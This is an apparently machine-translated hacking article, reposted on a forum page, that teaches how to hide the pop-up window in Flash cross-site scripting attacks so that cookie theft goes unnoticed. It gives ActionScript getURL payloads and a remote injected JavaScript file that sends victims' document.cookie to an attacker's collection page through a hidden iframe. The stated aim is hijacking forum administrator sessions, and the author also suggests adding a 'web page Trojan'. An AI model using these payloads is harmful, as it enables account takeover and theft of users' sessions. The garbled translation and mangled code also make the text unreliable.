Also say hidden hidden hidden hits - how to prevent Flash cross-station attacks from popping up the IE window

xiaoxiao2021-03-06 67

By: Ice Fryer http://www.icyfoxlovelace.com

I have been busy learning Win32 compilation, I have been too lazy to write articles. These days seem to be very fierce, but the pop-up IE window when I implement Flash cross-station attack, it is easy to cause others. The Flash cross-station attack failed, which is indeed a little headache. Do you have been looking for a method of implementing the IE window when I implement a Flash cross-station attack? How to hide your attack behavior? Let's let me solve this unclear problem with me, let Flash cross-station attack more perfect!

Generally speaking, everyone is a flash animation yourself when performing Flash cross-station attacks, and adds the batscript scripting function used to jump to other URLs in the first frame, as follows:

GETURL ("JavaScript: Window.Open ('http: // is used to collect cookie's web address?' Document.cookie", "_ Self")

Then put this Flash animation in the signature, post or SMS message, used to get the administrator or user cookie, so as to obtain administrative privileges, further access to the entire site, and finally achieve its own purpose. We can see that the most important thing throughout the cross-site attack is this ationcript script! That is, the code used in this script opened a window we love and hated, so we can only hide the script code to hide or remove the pop-up IE window, in addition to there is no way!

Let's first analyze the above ationscript script, which uses the ationscript script function "getURL" jump to a URL using the JavaScript protocol (the JavaScript protocol is the JavaScript script code we are very familiar with), using Document.cookie in JavaScript to cookie And connect cookies and a web page address for collecting cookie into a URL address of an HTTP protocol, and finally open the synthetic URL address using Window.Open to send cookies to the GET method to collect cookie webpages, and record Down.

Through the above analysis, let's further understand the pop-up IE window is generated by the code Window.Open in the JavaScript protocol. I believe that everyone knows that the second parameter of Window.Open is used to specify the name of the open window, its universal name There is "_media (IE6.0 opens in the media panel on the left side of the browser)", "_ Blank is open in the new window)", "_ Parent (open within the parent framework of the current frame. If the current frame is free, this The parameter value is equivalent to _self) "," _ search (IE5.0 opens in the search panel on the left side of the browser) ", _ Self (Open in the current window, override the current document)", _ TOP (outside all frames Open in the top window. If the current window has no frame structure, this parameter value is equivalent to _self) ", if we open the window with" _search ", don't you have a pop-up IE window? Ationscript script is changed to:

GETURL ("JavaScript: WINDOWT ('http: // is used to collect the cookie web page address?' Document.cookie, '_ search')", "_ self") Of course, this will open the search panel, which will also cause Doubt, but you can escape the chasing of closing the pop-up window software! Aunt, it's also a way!

If it is just above, I believe that many readers want to take me. . . . . .

Seeing the intelligent do you think of the idea of solving? Correct! Since supporting JavaScript, is there anything in the East Can't solve it? JavaScript is really beneficial!

If you have read my article "Building a Perfect IE Wood Trojan", and you can understand the code, you can imagine yourself first! Ha ha......

In that article, there is such a code below:

Jsurl = "http://www.godog.y365.com/wodemuma/ix.js" .Replace (g, '//');

Window.open ("File: JavaScript: Document.all.tags ('script') [0] .SRC = '" JSURL "; Eval ();", "icyfoxLoveland);

Using the JavaScript protocol to insert a JS code file on your website into a local file, we can also use it to insert a JS code file into the forum page for cross-site attacks, the corresponding batscript script is changed to:

GETURL ("JavaScript: Document.all.Tags ('script') [0] .src = 'http: www.godog.y365.com//wodemuma//icyfox.js'; Eval ();", "_ Self" )

Where Icyfox.js obtains the following:

CookieURL = "http: // Used to collect cookie's web address? cookie =" escape (document.cookie);

/ * Here you use escape () to cookie, used to prevent some special characters in cookies * /

Document.body.insertadjacenthtml ('Beforend', ' <// iframe>');</p> <p>/ * Here I used InsertAdjacenthtml in the last inserted framework of Body * /</p> <p>Here is mainly using JavaScript code documents that can introduce in different domains in a web page, and the introduced JavaScript code documentation will be integrated with this page!</p> <p>Ok! The problem of this flash attack pop-up IE window is solved! Of course, if you like, I add a web page Trojan in Icyfox.js, I have nothing to say!</p> <p>Finally, I will say it by the way, it can also be used to hide the pop-up IE window in other types of cross-station scripts! Send cookies with Microsoft.xmlhtttp controls, because it does not send only the current server like Microsoft.xmlhtttp controls, and the CZY "uses Microsoft.xmlhttttttttttttp control to send cookie" This sentence: "I thought in a way to use the InsertJacenthtml method in the web page to inject the HTML statement. It can be sent to the cookie does not appear IE window, but sometimes IE errors in actual use."</p> <p>I analyze some special characters in cookies, and CZY does not have correctly handled correctly or encoded, it will sometimes encounter IE errors in actual use, so I used Escape () to cookie, in After accepting cookies, please pay attention to decoding with UNEScape ()!</p></div><div class="text-center mt-3 text-grey"> 转载请注明原文地址:https://www.9cbs.com/read-90406.html</div><div class="plugin d-flex justify-content-center mt-3"></div><hr><div class="row"><div class="col-lg-12 text-muted mt-2"><i class="icon-tags mr-2"></i><span class="badge border border-secondary mr-2"><h2 class="h6 mb-0 small"><a class="text-secondary" href="tag-2.html">9cbs</a></h2></span></div></div></div></div><div class="card card-postlist border-white shadow"><div class="card-body"><div class="card-title"><div class="d-flex justify-content-between"><div><b>New Post</b>(<span class="posts">0</span>) </div><div></div></div></div><ul class="postlist list-unstyled"> </ul></div></div><div class="d-none threadlist"><input type="checkbox" name="modtid" value="90406" checked /></div></div></div></div></div><footer class="text-muted small bg-dark py-4 mt-3" id="footer"><div class="container"><div class="row"><div class="col">CopyRight © 2020 All Rights Reserved </div><div class="col text-right">Processed: <b>0.041</b>, SQL: <b>9</b></div></div></div></footer><script src="./lang/en-us/lang.js?2.2.0"></script><script src="view/js/jquery.min.js?2.2.0"></script><script src="view/js/popper.min.js?2.2.0"></script><script src="view/js/bootstrap.min.js?2.2.0"></script><script src="view/js/xiuno.js?2.2.0"></script><script src="view/js/bootstrap-plugin.js?2.2.0"></script><script src="view/js/async.min.js?2.2.0"></script><script src="view/js/form.js?2.2.0"></script><script> var debug = DEBUG = 0; var url_rewrite_on = 1; var url_path = './'; var forumarr = {"1":"Tech"}; var fid = 1; var uid = 0; var gid = 0; xn.options.water_image_url = 'view/img/water-small.png'; </script><script src="view/js/wellcms.js?2.2.0"></script><a class="scroll-to-top rounded" href="javascript:void(0);"><i class="icon-angle-up"></i></a><a class="scroll-to-bottom rounded" href="javascript:void(0);" style="display: inline;"><i class="icon-angle-down"></i></a></body></html><script> var forum_url = 'list-1.html'; var safe_token = 'hgTNavb01NDrO_2BuaNn21l_2FBWViNDRyVSKxNv2ifyY9xXqPhVI_2BnmfkWQRBx2axAcH6HHEITjH9moOP8V'; var body = $('body'); body.on('submit', '#form', function() { var jthis = $(this); var jsubmit = jthis.find('#submit'); jthis.reset(); jsubmit.button('loading'); var postdata = jthis.serializeObject(); $.xpost(jthis.attr('action'), postdata, function(code, message) { if(code == 0) { location.reload(); } else { $.alert(message); jsubmit.button('reset'); } }); return false; }); function resize_image() { var jmessagelist = $('div.message'); var first_width = jmessagelist.width(); jmessagelist.each(function() { var jdiv = $(this); var maxwidth = jdiv.attr('isfirst') ? first_width : jdiv.width(); var jmessage_width = Math.min(jdiv.width(), maxwidth); jdiv.find('img, embed, iframe, video').each(function() { var jimg = $(this); var img_width = this.org_width; var img_height = this.org_height; if(!img_width) { var img_width = jimg.attr('width'); var img_height = jimg.attr('height'); this.org_width = img_width; this.org_height = img_height; } if(img_width > jmessage_width) { if(this.tagName == 'IMG') { jimg.width(jmessage_width); jimg.css('height', 'auto'); jimg.css('cursor', 'pointer'); jimg.on('click', function() { }); } else { jimg.width(jmessage_width); var height = (img_height / img_width) * jimg.width(); jimg.height(height); } } }); }); } function resize_table() { $('div.message').each(function() { var jdiv = $(this); jdiv.find('table').addClass('table').wrap('<div class="table-responsive"></div>'); }); } $(function() { resize_image(); resize_table(); $(window).on('resize', resize_image); }); var jmessage = $('#message'); jmessage.on('focus', function() {if(jmessage.t) { clearTimeout(jmessage.t); jmessage.t = null; } jmessage.css('height', '6rem'); }); jmessage.on('blur', function() {jmessage.t = setTimeout(function() { jmessage.css('height', '2.5rem');}, 1000); }); $('#nav li[data-active="fid-1"]').addClass('active'); </script>